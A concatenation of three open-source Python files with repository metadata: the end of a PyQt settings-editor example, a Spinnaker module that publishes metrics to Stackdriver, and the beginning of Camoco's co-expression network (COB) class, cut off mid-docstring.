self.setItemDelegate(VariantDelegate(self))
self.setHeaderLabels(("Setting", "Type", "Value"))
self.header().setResizeMode(0, QtGui.QHeaderView.Stretch)
self.header().setResizeMode(2, QtGui.QHeaderView.Stretch)
self.settings = None
self.refreshTimer = QtCore.QTimer()
self.refreshTimer.setInterval(2000)
self.autoRefresh = False
self.groupIcon = QtGui.QIcon()
self.groupIcon.addPixmap(self.style().standardPixmap(QtGui.QStyle.SP_DirClosedIcon),
QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.groupIcon.addPixmap(self.style().standardPixmap(QtGui.QStyle.SP_DirOpenIcon),
QtGui.QIcon.Normal, QtGui.QIcon.On)
self.keyIcon = QtGui.QIcon()
self.keyIcon.addPixmap(self.style().standardPixmap(QtGui.QStyle.SP_FileIcon))
self.refreshTimer.timeout.connect(self.maybeRefresh)
def setSettingsObject(self, settings):
self.settings = settings
self.clear()
if self.settings is not None:
self.settings.setParent(self)
self.refresh()
if self.autoRefresh:
self.refreshTimer.start()
else:
self.refreshTimer.stop()
def sizeHint(self):
return QtCore.QSize(800, 600)
def setAutoRefresh(self, autoRefresh):
self.autoRefresh = autoRefresh
if self.settings is not None:
if self.autoRefresh:
self.maybeRefresh()
self.refreshTimer.start()
else:
self.refreshTimer.stop()
def setFallbacksEnabled(self, enabled):
if self.settings is not None:
self.settings.setFallbacksEnabled(enabled)
self.refresh()
def maybeRefresh(self):
if self.state() != QtGui.QAbstractItemView.EditingState:
self.refresh()
def refresh(self):
if self.settings is None:
return
# The signal might not be connected.
try:
self.itemChanged.disconnect(self.updateSetting)
except:
pass
self.settings.sync()
self.updateChildItems(None)
self.itemChanged.connect(self.updateSetting)
def event(self, event):
if event.type() == QtCore.QEvent.WindowActivate:
if self.isActiveWindow() and self.autoRefresh:
self.maybeRefresh()
return super(SettingsTree, self).event(event)
def updateSetting(self, item):
key = item.text(0)
ancestor = item.parent()
while ancestor:
key = ancestor.text(0) + '/' + key
ancestor = ancestor.parent()
d = item.data(2, QtCore.Qt.UserRole)
self.settings.setValue(key, item.data(2, QtCore.Qt.UserRole))
if self.autoRefresh:
self.refresh()
def updateChildItems(self, parent):
dividerIndex = 0
for group in self.settings.childGroups():
childIndex = self.findChild(parent, group, dividerIndex)
if childIndex != -1:
child = self.childAt(parent, childIndex)
child.setText(1, '')
child.setText(2, '')
child.setData(2, QtCore.Qt.UserRole, None)
self.moveItemForward(parent, childIndex, dividerIndex)
else:
child = self.createItem(group, parent, dividerIndex)
child.setIcon(0, self.groupIcon)
dividerIndex += 1
self.settings.beginGroup(group)
self.updateChildItems(child)
self.settings.endGroup()
for key in self.settings.childKeys():
childIndex = self.findChild(parent, key, 0)
if childIndex == -1 or childIndex >= dividerIndex:
if childIndex != -1:
child = self.childAt(parent, childIndex)
for i in range(child.childCount()):
self.deleteItem(child, i)
self.moveItemForward(parent, childIndex, dividerIndex)
else:
child = self.createItem(key, parent, dividerIndex)
child.setIcon(0, self.keyIcon)
dividerIndex += 1
else:
child = self.childAt(parent, childIndex)
value = self.settings.value(key)
if value is None:
child.setText(1, 'Invalid')
else:
child.setText(1, value.__class__.__name__)
child.setText(2, VariantDelegate.displayText(value))
child.setData(2, QtCore.Qt.UserRole, value)
while dividerIndex < self.childCount(parent):
self.deleteItem(parent, dividerIndex)
def createItem(self, text, parent, index):
after = None
if index != 0:
after = self.childAt(parent, index - 1)
if parent is not None:
item = QtGui.QTreeWidgetItem(parent, after)
else:
item = QtGui.QTreeWidgetItem(self, after)
item.setText(0, text)
item.setFlags(item.flags() | QtCore.Qt.ItemIsEditable)
return item
def deleteItem(self, parent, index):
if parent is not None:
item = parent.takeChild(index)
else:
item = self.takeTopLevelItem(index)
del item
def childAt(self, parent, index):
if parent is not None:
return parent.child(index)
else:
return self.topLevelItem(index)
def childCount(self, parent):
if parent is not None:
return parent.childCount()
else:
return self.topLevelItemCount()
def findChild(self, parent, text, startIndex):
for i in range(self.childCount(parent)):
if self.childAt(parent, i).text(0) == text:
return i
return -1
def moveItemForward(self, parent, oldIndex, newIndex):
for int in range(oldIndex - newIndex):
self.deleteItem(parent, newIndex)
class VariantDelegate(QtGui.QItemDelegate):
def __init__(self, parent=None):
super(VariantDelegate, self).__init__(parent)
self.boolExp = QtCore.QRegExp()
self.boolExp.setPattern('true|false')
self.boolExp.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.byteArrayExp = QtCore.QRegExp()
self.byteArrayExp.setPattern('[\\x00-\\xff]*')
self.charExp = QtCore.QRegExp()
self.charExp.setPattern('.')
self.colorExp = QtCore.QRegExp()
self.colorExp.setPattern('\\(([0-9]*),([0-9]*),([0-9]*),([0-9]*)\\)')
self.doubleExp = QtCore.QRegExp()
self.doubleExp.setPattern('')
self.pointExp = QtCore.QRegExp()
self.pointExp.setPattern('\\((-?[0-9]*),(-?[0-9]*)\\)')
self.rectExp = QtCore.QRegExp()
self.rectExp.setPattern('\\((-?[0-9]*),(-?[0-9]*),(-?[0-9]*),(-?[0-9]*)\\)')
self.signedIntegerExp = QtCore.QRegExp()
self.signedIntegerExp.setPattern('-?[0-9]*')
self.sizeExp = QtCore.QRegExp(self.pointExp)
self.unsignedIntegerExp = QtCore.QRegExp()
self.unsignedIntegerExp.setPattern('[0-9]*')
self.dateExp = QtCore.QRegExp()
self.dateExp.setPattern('([0-9]{,4})-([0-9]{,2})-([0-9]{,2})')
self.timeExp = QtCore.QRegExp()
self.timeExp.setPattern('([0-9]{,2}):([0-9]{,2}):([0-9]{,2})')
self.dateTimeExp = QtCore.QRegExp()
self.dateTimeExp.setPattern(self.dateExp.pattern() + 'T' + self.timeExp.pattern())
def paint(self, painter, option, index):
if index.column() == 2:
value = index.model().data(index, QtCore.Qt.UserRole)
if not self.isSupportedType(value):
myOption = QtGui.QStyleOptionViewItem(option)
myOption.state &= ~QtGui.QStyle.State_Enabled
super(VariantDelegate, self).paint(painter, myOption, index)
return
super(VariantDelegate, self).paint(painter, option, index)
def createEditor(self, parent, option, index):
if index.column() != 2:
return None
originalValue = index.model().data(index, QtCore.Qt.UserRole)
if not self.isSupportedType(originalValue):
return None
lineEdit = QtGui.QLineEdit(parent)
lineEdit.setFrame(False)
if isinstance(originalValue, bool):
regExp = self.boolExp
elif isinstance(originalValue, float):
regExp = self.doubleExp
elif isinstance(originalValue, int):
regExp = self.signedIntegerExp
elif isinstance(originalValue, QtCore.QByteArray):
regExp = self.byteArrayExp
elif isinstance(originalValue, QtGui.QColor):
regExp = self.colorExp
elif isinstance(originalValue, QtCore.QDate):
regExp = self.dateExp
elif isinstance(originalValue, QtCore.QDateTime):
regExp = self.dateTimeExp
elif isinstance(originalValue, QtCore.QTime):
regExp = self.timeExp
elif isinstance(originalValue, QtCore.QPoint):
regExp = self.pointExp
elif isinstance(originalValue, QtCore.QRect):
regExp = self.rectExp
elif isinstance(originalValue, QtCore.QSize):
regExp = self.sizeExp
else:
regExp = QtCore.QRegExp()
if not regExp.isEmpty():
validator = QtGui.QRegExpValidator(regExp, lineEdit)
lineEdit.setValidator(validator)
return lineEdit
def setEditorData(self, editor, index):
value = index.model().data(index, QtCore.Qt.UserRole)
if editor is not None:
editor.setText(self.displayText(value))
def setModelData(self, editor, model, index):
if not editor.isModified():
return
text = editor.text()
validator = editor.validator()
if validator is not None:
state, text, _ = validator.validate(text, 0)
if state != QtGui.QValidator.Acceptable:
return
originalValue = index.model().data(index, QtCore.Qt.UserRole)
if isinstance(originalValue, QtGui.QColor):
self.colorExp.exactMatch(text)
value = QtGui.QColor(min(int(self.colorExp.cap(1)), 255),
min(int(self.colorExp.cap(2)), 255),
min(int(self.colorExp.cap(3)), 255),
min(int(self.colorExp.cap(4)), 255))
elif isinstance(originalValue, QtCore.QDate):
value = QtCore.QDate.fromString(text, QtCore.Qt.ISODate)
if not value.isValid():
return
elif isinstance(originalValue, QtCore.QDateTime):
value = QtCore.QDateTime.fromString(text, QtCore.Qt.ISODate)
if not value.isValid():
return
elif isinstance(originalValue, QtCore.QTime):
value = QtCore.QTime.fromString(text, QtCore.Qt.ISODate)
if not value.isValid():
return
elif isinstance(originalValue, QtCore.QPoint):
self.pointExp.exactMatch(text)
value = QtCore.QPoint(int(self.pointExp.cap(1)),
int(self.pointExp.cap(2)))
elif isinstance(originalValue, QtCore.QRect):
self.rectExp.exactMatch(text)
value = QtCore.QRect(int(self.rectExp.cap(1)),
int(self.rectExp.cap(2)),
int(self.rectExp.cap(3)),
int(self.rectExp.cap(4)))
elif isinstance(originalValue, QtCore.QSize):
self.sizeExp.exactMatch(text)
value = QtCore.QSize(int(self.sizeExp.cap(1)),
int(self.sizeExp.cap(2)))
elif isinstance(originalValue, list):
value = text.split(',')
else:
value = type(originalValue)(text)
model.setData(index, self.displayText(value), QtCore.Qt.DisplayRole)
model.setData(index, value, QtCore.Qt.UserRole)
@staticmethod
def isSupportedType(value):
return isinstance(value, (bool, float, int, QtCore.QByteArray,
str, QtGui.QColor, QtCore.QDate, QtCore.QDateTime,
QtCore.QTime, QtCore.QPoint, QtCore.QRect, QtCore.QSize,
list))
@staticmethod
def displayText(value):
if isinstance(value, (bool, int, QtCore.QByteArray)):
return str(value)
if isinstance(value, str):
return value
elif isinstance(value, float):
return '%g' % value
elif isinstance(value, QtGui.QColor):
return '(%u,%u,%u,%u)' % (value.red(), value.green(), value.blue(), value.alpha())
elif isinstance(value, (QtCore.QDate, QtCore.QDateTime, QtCore.QTime)):
return value.toString(QtCore.Qt.ISODate)
elif isinstance(value, QtCore.QPoint):
return '(%d,%d)' % (value.x(), value.y())
elif isinstance(value, QtCore.QRect):
return '(%d,%d,%d,%d)' % (value.x(), value.y(), value.width(), value.height())
elif isinstance(value, QtCore.QSize):
return '(%d,%d)' % (value.width(), value.height())
elif isinstance(value, list):
return ','.join(value)
elif value is None:
return '<Invalid>'
return '<%s>' % value
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
mainWin = MainWindow()
mainWin.show()
sys.exit(app.exec_())
|
cherry-wb/SideTools
|
examples/tools/settingseditor/settingseditor.py
|
Python
|
apache-2.0
| 26,175
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring
import copy
import json
import logging
import re
import time
import traceback
import google_service
import spectator_client
import stackdriver_descriptors
import httplib2
try:
from urllib2 import (
Request as urllibRequest,
urlopen as urllibUrlopen)
except ImportError:
from urllib.request import (
Request as urllibRequest,
urlopen as urllibUrlopen)
try:
from googleapiclient.errors import HttpError
STACKDRIVER_AVAILABLE = True
except ImportError:
STACKDRIVER_AVAILABLE = False
class StackdriverMetricsService(google_service.GoogleMonitoringService):
"""Helper class for interacting with Stackdriver."""
SERVICE_SCOPE = 'https://www.googleapis.com/auth/monitoring'
SERVICE_KEY = 'stackdriver'
SERVICE_NAME = 'monitoring'
SERVICE_VERSION = 'v3'
MAX_BATCH = 200
JANITOR_PERIOD = 600
@property
def stackdriver_options(self):
return self.service_options
@property
def descriptor_manager(self):
"""Return MetricDescriptorManager."""
return self.__descriptor_manager
def __init__(self, stub_factory, options):
"""Constructor.
Args:
stub_factory: [callable that creates stub for stackdriver]
This is passed as a callable to defer initialization because
we create the handlers before we process commandline args.
"""
super(StackdriverMetricsService, self).__init__(
stub_factory, options)
# The janitor prepares metric descriptors before first write.
self.__janitor_func = lambda: self.__auto_audit_metric_descriptors()
self.__next_janitor_time = time.time()
self.__good_janitor_count = 0
self.__distributions_also_have_count = self.service_options.get(
'distributions_also_have_count')
self.__fix_custom_metrics_unsafe = self.service_options.get(
'fix_custom_metrics_unsafe', False)
self.__log_400_data = self.service_options.get('log_400_data', False)
manager_options = dict(options)
manager_options['spectator'] = self.spectator_helper.options
manager = stackdriver_descriptors.MetricDescriptorManager(
self, spectator_client.ResponseProcessor(manager_options))
self.__descriptor_manager = manager
@staticmethod
def add_parser_arguments(parser):
"""Add arguments for configuring stackdriver."""
parser.add_argument('--project', default='')
parser.add_argument('--zone', default='')
parser.add_argument('--instance_id', default=0, type=int)
parser.add_argument('--credentials_path', default=None)
parser.add_argument(
'--stackdriver_generic_task_resources',
default=False,
action='store_true',
help='Use stackdriver "generic_task" monitored resources'
' rather than the container or VM.')
parser.add_argument(
'--manage_stackdriver_descriptors',
choices=['none', 'full', 'create', 'delete'],
help='Specifies how to maintain stackdriver descriptors on startup.'
'\n none: Do nothing.'
'\n create: Only create new descriptors seen in the'
' metric filter default.yml'
'\n delete: Only delete existing descriptors no longer'
' mentioned in filter default.yml'
'\n full: Both create and delete.')
def __auto_audit_metric_descriptors(self):
"""The janitor function attempts to bring Stackdriver into compliance.
If the metric descriptors are already as expected then we'll disable
the janitor for the rest of the process' lifetime. Otherwise we'll
continue to call it and try again around every JANITOR_PERIOD seconds
to give time for the system to settle down.
The reason we expect to have problems is that old replicas are still
running and recreating the descriptors we are trying to delete when
stackdriver automatically creates metrics they are attempting to write.
If this is the case, we'll keep trying to clear them out until, eventually,
the old processes are no longer around to overwrite us.
Should something re-emerge then we'll be messed up until the next restart.
Note that each replica of each service is probably trying to create all
the descriptors so there is a lot of activity here. Since the descriptors
are all the same, there should not be a problem with these replicas
conflicting or needing coordination.
Note if management is disabled then this will be in a stable state
though still inconsistent with stackdriver because there will not
be any errors or activity performed.
"""
secs_remaining = self.__next_janitor_time - time.time()
if secs_remaining > 0:
logging.debug('Janitor skipping audit for at least another %d secs',
secs_remaining)
return
logging.info('Janitor auditing metric descriptors...')
scoped_options = {'stackdriver': self.service_options}
audit_results = self.descriptor_manager.audit_descriptors(scoped_options)
stable = (audit_results.errors == 0
and audit_results.num_fixed_issues == 0)
now = time.time()
self.__next_janitor_time = now + self.JANITOR_PERIOD
if stable:
self.__good_janitor_count += 1
if self.__good_janitor_count > 1:
logging.info('Metric descriptors appear stable. Disabling janitor.')
self.__janitor_func = lambda: None
else:
logging.info('Keeping janitor around to build confidence.')
else:
self.__good_janitor_count = 0
logging.debug('Metric descriptors are not yet stable.'
' There may be some errors writing metrics.'
' Check again in %d secs.',
self.JANITOR_PERIOD)
def add_metric_to_timeseries(self, service, name, instance,
metric_metadata, service_metadata, result):
data_list = [
google_service.GoogleMeasurementData.make_from_measurement(
self, service_metadata, metric_metadata, measurement)
for measurement in instance['values']
]
if not data_list:
return
sample = data_list[0]
points = [{'interval': {'endTime': data.endTime}, 'value': data.valueData}
for data in data_list]
if sample.metricKind == 'CUMULATIVE':
for elem in points:
elem['interval']['startTime'] = sample.startTime
name, tags = self.spectator_helper.normalize_name_and_tags(
service, name, instance, metric_metadata)
metric = {
'type': self.descriptor_manager.name_to_type(name),
'labels': {tag['key']: tag['value'] for tag in tags}
}
monitored_resource = self.get_monitored_resource(service, service_metadata)
if (sample.valueType == 'DISTRIBUTION'
and self.__distributions_also_have_count):
# Add an implied metric which is just a counter.
# This is to workaround a temporary shortcoming querying the counts.
# Eventually this will be deprecated.
counter_points = copy.deepcopy(points)
for elem in counter_points:
elem['value'] = {
'int64Value': int(sample.valueData['distributionValue']['count'])
}
counter_metric = copy.deepcopy(metric)
counter_metric['type'] = self.__descriptor_manager.distribution_to_counter(
counter_metric['type'])
result.append({
'metric': counter_metric,
'resource': monitored_resource,
'metricKind': 'CUMULATIVE',
'valueType': 'INT64',
'points': counter_points})
result.append({
'metric': metric,
'resource': monitored_resource,
'metricKind': sample.metricKind,
'valueType': sample.valueType,
'points': points})
def publish_metrics(self, service_metrics):
self.__janitor_func()
time_series = []
self._update_monitored_resources(service_metrics)
spectator_client.foreach_metric_in_service_map(
service_metrics, self.add_metric_to_timeseries, time_series)
offset = 0
method = self.stub.projects().timeSeries().create
while offset < len(time_series):
last = min(offset + self.MAX_BATCH, len(time_series))
chunk = time_series[offset:last]
try:
(method(name=self.project_to_resource(self.project),
body={'timeSeries': chunk})
.execute())
except HttpError as err:
self.handle_time_series_http_error(err, chunk)
offset = last
return len(time_series)
def find_problematic_elements(self, error, batch):
try:
content = json.JSONDecoder().decode(error.content.decode('utf-8'))
message = content['error']['message']
except KeyError:
return []
if self.__log_400_data:
time_series_index_pattern = r'timeSeries\[(\d+?)\]'
log_count = 0
for match in re.finditer(time_series_index_pattern, message):
ts_index = int(match.group(1))
log_count += 1
if log_count > 3:
break
logging.info('timeSeries[%d] -> %r', ts_index,batch[ts_index])
time_series_range_pattern = r'timeSeries\[(\d+?)\-(\d+?)\]'
for match in re.finditer(time_series_range_pattern, message):
ts_start_index = int(match.group(1))
ts_end_index = int(match.group(2))
text = []
for index in range(ts_start_index, ts_end_index):
text.append('[%d] -> %r' % (index, batch[index]))
logging.info('\n%s', '\n'.join(text))
break
found = []
counter_to_gauge_pattern = (
r'timeSeries\[(\d+?)\]\.metricKind'
r' had an invalid value of \"(CUMULATIVE|GAUGE)\"'
r'.* must be (CUMULATIVE|GAUGE).')
for match in re.finditer(counter_to_gauge_pattern, message):
ts_index = int(match.group(1))
metric = batch[ts_index]['metric']
metric_type = metric['type']
found.append((self.delete_descriptor_and_retry,
metric_type, batch[ts_index]))
return found
def delete_descriptor_and_retry(self, metric_type, ts_request):
metric_name_param = '/'.join([
self.project_to_resource(self.project),
'metricDescriptors', metric_type])
api = self.stub.projects().metricDescriptors()
try:
logging.info('Deleting existing descriptor %s', metric_name_param)
response = api.delete(name=metric_name_param).execute()
logging.info('Delete response: %s', repr(response))
except HttpError as err:
logging.error('Could not delete descriptor %s', err)
if err.resp.status != 404:
return
else:
logging.info("Ignore error.")
logging.info('Retrying create timeseries %s', ts_request)
(self.stub.projects().timeSeries().create(
name=self.project_to_resource(self.project),
body={'timeSeries': ts_request})
.execute())
def handle_time_series_http_error(self, error, batch):
logging.error('Caught %s', error)
if error.resp.status == 400:
problems = self.find_problematic_elements(error, batch)
logging.info('PROBLEMS %r', problems)
if problems and not self.__fix_custom_metrics_unsafe:
logging.info(
'Fixing this problem would wipe stackdriver data.'
' Doing so was not enabled. To enable, add:\n\n'
'stackdriver:\n fix_custom_metrics_unsafe: true\n'
'to your spinnaker-monitoring-local.yml')
elif problems:
logging.info('Attempting to fix these problems. This may lose'
' stackdriver data for these metrics.')
for elem in problems:
try:
elem[0](*elem[1:])
except BaseException as bex:
traceback.print_exc()
logging.error('Failed %s(%s): %s', elem[0], elem[1:], bex)
class StackdriverServiceFactory(google_service.GoogleMonitoringServiceFactory):
SERVICE_CLASS = StackdriverMetricsService
def add_argparser(self, parser):
"""Implements server_handlers.MonitorCommandHandler interface."""
StackdriverMetricsService.add_parser_arguments(parser)
parser.add_argument('--stackdriver', default=False, action='store_true',
dest='monitor_stackdriver',
help='Publish metrics to Stackdriver.')
parser.add_argument(
'--fix_stackdriver_labels_unsafe', default=True,
action='store_true', help='DEPRECATED')
parser.add_argument(
'--nofix_stackdriver_labels_unsafe',
dest='fix_stackdriver_labels_unsafe',
action='store_false', help='DEPRECATED')
def make_service(options, factory=StackdriverServiceFactory):
return factory()(options, None)
|
spinnaker/spinnaker-monitoring
|
spinnaker-monitoring-daemon/spinnaker-monitoring/stackdriver_service.py
|
Python
|
apache-2.0
| 13,237
|
#!/usr/bin/python3
import warnings
warnings.simplefilter(action="ignore", category=FutureWarning)
import camoco.PCCUP as PCCUP
from .Camoco import Camoco
from .RefGen import RefGen
from .Locus import Locus, Gene
from .Expr import Expr
from .Tools import memoize, available_datasets
from .Term import Term
from .Ontology import Ontology
from math import isinf
from numpy import matrix, arcsinh, tanh
from collections import defaultdict, Counter
from itertools import chain
from matplotlib.collections import LineCollection
from subprocess import Popen, PIPE
from scipy.spatial.distance import squareform
from scipy.special import comb
from scipy.stats import norm, pearsonr
from scipy.cluster.hierarchy import linkage, leaves_list, dendrogram
from statsmodels.sandbox.regression.predstd import wls_prediction_std
from io import UnsupportedOperation
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import statsmodels.api as sm
import networkx as nx
import pandas as pd
import numpy as np
import itertools
import fastcluster
import psutil
from odo import odo
from matplotlib import rcParams
rcParams.update({"figure.autolayout": True})
import operator
import statsmodels.api as sm
import sys
import pdb
import json
import gc
class COB(Expr):
"""
A COB object represents an easily browsable Co-expression network.
(COB-> co-expression browser)
"""
def __init__(self, name): # pragma: no cover
"""
Initialize a built co-expression network
Parameters
----------
name : str
The name of the co-expression network (from when it was built)
Returns
-------
cob : COB
A COB object
"""
super().__init__(name=name)
self.log("Loading Coex table")
self.coex = self._bcolz("coex", blaze=True)
self.sigs = None
if self.coex is None:
self.log("{} is empty", name)
if not self._global("significance_threshold") is None:
self.set_sig_edge_zscore(float(self._global("significance_threshold")))
self.log("Loading Global Degree")
self.degree = self._bcolz("degree")
if self.degree is None:
self.log("{} is empty", name)
if (
not available_datasets("Ontology", "{}MCL".format(name))
and self.coex is not None
):
self._calculate_clusters()
self.log("Loading Clusters")
self.clusters = self._bcolz("clusters")
if self.clusters is None:
self.log("Clusters not loaded for: {} ()", name)
self.MCL = None
else:
self.MCL = Ontology("{}MCL".format(self.name))
def __repr__(self):
return "<COB: {}>".format(self.name)
def __str__(self):
return self.__repr__()
def summary(self, file=sys.stdout): # pragma: no cover
"""
Returns a nice summary of what is in the network.
Parameters
----------
file : str,default=stdout,optional
Returns
-------
None
The summary is printed either to stdout or a provided file.
"""
import camoco as co
print(
f"""
CAMOCO (version:{co.__version__})
---------------------------------------
COB Dataset: {self.name}
Desc: {self.description}
RawType: {self.rawtype}
TransformationLog: {self._transformation_log}
Num Genes: {self.num_genes():,}({(self.num_genes() / self.num_genes(raw=True)) * 100:.2g}% of total)
Num Accessions: {self.num_accessions()}
Network Stats
-------------
Unthresholded Interactions: {len(self.coex):,}
Thresholded (Z >= {self._global("current_significance_threshold")}): {len(self.sigs):,}
Raw
------------------
Num Raw Genes: {len(self.expr(raw=True)):,}
Num Raw Accessions: {len(self.expr(raw=True).columns)}
QC Parameters
------------------
min expr level: {self._global("qc_min_expr")}
- expression below this is set to NaN
max gene missing data: {self._global("qc_max_gene_missing_data")}
- genes missing more than this percent are removed
max accession missing data: {self._global("qc_max_accession_missing_data")}
- Accession missing more than this percent are removed
min single sample expr: {self._global("qc_min_single_sample_expr")}
- genes must have this amount of expression in
at least one accession.
Clusters
------------------
Num clusters (size >= 10): {sum(self.clusters.groupby("cluster").apply(len) >= 10)}
""",
file=file,
)
def qc_gene(self):
"""
Returns qc statistics broken down by chromosome
Paramaters
----------
None
Returns
-------
DataFrame
A dataframe containing QC info
"""
qc_gene = self._bcolz("qc_gene")
# generate the parent refegen
rg = self._parent_refgen
qc_gene["chrom"] = [rg[x].chrom if x in rg else "None" for x in qc_gene.index]
return qc_gene.groupby("chrom").aggregate(sum, axis=0)
@property
@memoize
def edge_FDR(self): # C
"""
Returns a calculated false discovery rate of the Edges. This is
calculated from the number of expected edges from the standard normal
distribution, which a network will follow if the gene expression matrix
is simply random data. This function looks at the number of expected
'significant' edges and divides that by the number of observed edges in
the network.
Parameters
-----------
None
Returns
-------
FDR : float
The ratio of expected edges / observed edges
"""
# get the percent of significant edges
num_sig = self.coex.significant.coerce(to="int32").sum() / len(self.coex)
# calulate the number expected
num_exp = 1 - norm.cdf(float(self._global("significance_threshold")))
# FDR is the percentage expected over the percentage found
return num_exp / num_sig
def set_sig_edge_zscore(self, zscore):
"""
Sets the 'significance' threshold for the coex network. This will
affect thresholded network metrics that use degree (e.g. locality)
It will not affect unthresholded metrics like Density.
Parameters
----------
zscore : float
the new significance threshold
Returns
-------
None
"""
# Don't do anything if there isn't a coex table
if self.coex is None:
return
# Only update if needed
cur_sig = self._global("current_significance_threshold")
new_sig = cur_sig is None or not (float(cur_sig) == zscore)
# Set the new significant value
if new_sig:
# If the column doesn't exist because of an error it may fail
try:
self.coex.data.delcol(name="significant")
except ValueError:
pass
# Add the column to the underlying data structure
self.coex.data.addcol(
self.coex.data.eval("score >= " + str(zscore)),
pos=2,
name="significant",
)
self.coex.data.flush()
# Keep track of the current threshold
self._global("current_significance_threshold", zscore)
self._calculate_degree(update_db=False)
# Rebuild significant index set
if new_sig or self.sigs is None:
self.sigs = np.array(
[ind for ind in self.coex.data["significant"].wheretrue()]
)
self.sigs.sort()
return None
def _coex_DataFrame(self, ids=None, sig_only=True):
"""
Converts the underlying coexpression table into
a pandas dataframe
Parameters
----------
ids : array-like of ints (default: None)
Indices to include in the data frame. Usually
computed from another COB method (e.g.
PCCUP.coex_index). If None, then all indices
will be included.
sig_only : bool (default: True)
If true, only "significant" edges will be
included in the table. If False, all edges will
be included.
Returns
-------
A Pandas Dataframe
.. warning:: This will put the entire gene-by-accession
dataframe into memory.
"""
# If no ids are provided, get all of them
if ids is None:
if sig_only:
ids = self.sigs
else:
return self.coex.data.todataframe()
else:
ids.sort()
if sig_only:
ids = np.intersect1d(ids, self.sigs, assume_unique=True)
# Get the DataFrame
df = pd.DataFrame.from_items(
((key, self.coex.data[key][ids]) for key in self.coex.data.names)
)
# df = odo(self.coex[ids],pd.DataFrame)
df.set_index(ids, inplace=True)
return df
def neighbors(
self,
gene,
sig_only=True,
names_as_index=True,
names_as_cols=False,
return_gene_set=False,
):
"""
Returns a DataFrame containing the neighbors for gene.
Parameters
----------
gene : co.Locus
The gene for which to extract neighbors
sig_only : bool (default: True)
A flag to include only significant interactions.
names_as_index : bool (default: True)
Include gene names as the index. If this and `names_as_cols` are
both False, only the interactions are returned which is a faster
operation than including gene names.
names_as_cols : bool (default: False)
Include gene names as two columns named 'gene_a' and 'gene_b'.
return_gene_set : bool (default: False)
Return the set of neighbors instead of a dataframe
Returns
-------
- A DataFrame containing edges
- A Gene set IF return_gene_set is true
"""
# Find the neighbors
gene_id = self._get_gene_index(gene)
ids = PCCUP.coex_neighbors(gene_id, self.num_genes())
edges = self._coex_DataFrame(ids=ids, sig_only=sig_only)
del ids
if len(edges) == 0:
edges = pd.DataFrame(
columns=["gene_a", "gene_b", "score", "distance", "significant"]
)
if names_as_cols:
return edges
else:
return edges.set_index(["gene_a", "gene_b"])
if return_gene_set:
names_as_index = True
# Find the indexes if necessary
if names_as_index or names_as_cols:
names = self._expr.index.values
ids = edges.index.values
ids = PCCUP.coex_expr_index(ids, self.num_genes())
edges.insert(0, "gene_a", names[ids[:, 0]])
edges.insert(1, "gene_b", names[ids[:, 1]])
del ids
del names
if return_gene_set:
neighbors = set(self.refgen[set(edges["gene_a"]).union(edges["gene_b"])])
if len(neighbors) == 1:
return set()
neighbors.remove(gene)
return neighbors
if names_as_index and not names_as_cols:
edges = edges.set_index(["gene_a", "gene_b"])
return edges
def neighborhood(self, gene_list, return_genes=False, neighbors_only=False):
"""
Find the genes that have network connections the the gene_list.
Parameters
----------
Input: A gene List
The gene list used to obtain the neighborhood.
Returns
-------
A Dataframe containing gene ids which have at least
one edge with another gene in the input list. Also returns
global degree
"""
if isinstance(gene_list, Locus):
gene_list = [gene_list]
gene_list = set(gene_list)
neighbors = set()
for gene in gene_list:
neighbors.update(self.neighbors(gene, sig_only=True, return_gene_set=True))
# Remove the neighbors who are in the gene_list
neighbors = neighbors.difference(gene_list)
if return_genes == False:
neighbors = pd.DataFrame({"gene": [x.id for x in neighbors]})
neighbors["neighbor"] = True
local = pd.DataFrame({"gene": [x.id for x in gene_list]})
local["neighbor"] = False
if neighbors_only == False:
return pd.concat([local, neighbors])
else:
return neighbors
elif return_genes == True:
if neighbors_only == False:
neighbors.update(gene_list)
return neighbors
else:
return neighbors
def next_neighbors(
self, gene_list, n=None, return_table=False, include_query=False
):
"""
Given a set of input genes, return the next (n) neighbors
that have the stronges connection to the input set.
Parameters
----------
gene_list : list-like of co.Locus
An iterable of genes for which the next neighbors will be
calculated.
n : int (default: None)
The number of next neighbors to return. If None, the method
will return ALL neighbors
return_table : bool (default:False)
If true, a table with neighbors and scores will be
returned
include_query : bool (default:False)
If True (and return table is False) the query gene(s) will
be included in the return list
Returns
-------
returns a list containing the strongest connected neighbors
"""
if isinstance(gene_list, Locus):
gene_list = [gene_list]
neighbors = defaultdict(lambda: 0)
for gene in set(gene_list):
edges = self.neighbors(gene, names_as_cols=True)
source_id = gene.id
for g1, g2, score in zip(edges["gene_a"], edges["gene_b"], edges["score"]):
if g1 == source_id:
neighbors[g2] += score
else:
neighbors[g1] += score
neighbors = sorted(neighbors.items(), key=operator.itemgetter(1), reverse=True)
if n != None:
neighbors = neighbors[:n]
if return_table == True:
return pd.DataFrame(neighbors, columns=["neighbor", "score"])
else:
neighbors = set(self.refgen[[x[0] for x in neighbors]])
if include_query == True:
neighbors.update(gene_list)
return neighbors
def coexpression(self, gene_a, gene_b):
"""
Returns a coexpression z-score between two genes. This
is the pearson correlation coefficient of the two genes'
expression profiles across the accessions (experiments).
This value is pulled from the
Parameters
----------
gene_a : camoco.Locus
The first gene
gene_b : camoco.Locus
The second gene
Returns
Coexpression Z-Score
"""
if gene_a.id == gene_b.id:
# We don't cache these results
score = self._coex_concordance(gene_a, gene_b)
significant = 0
distance = 0
return pd.Series(
[score, significant, distance],
name=(gene_a.id, gene_b.id),
index=["score", "significant", "distance"],
)
return self.subnetwork([gene_a, gene_b], sig_only=False).iloc[0]
def subnetwork(
self,
gene_list=None,
sig_only=True,
min_distance=None,
filter_missing_gene_ids=True,
trans_locus_only=False,
names_as_index=True,
names_as_cols=False,
):
"""
Extract a subnetwork of edges exclusively between genes
within the gene_list. Also includes various options for
what information to report, see Parameters.
Parameters
----------
gene_list : iter of Loci
The genes from which to extract a subnetwork.
If gene_list is None, the function will assume
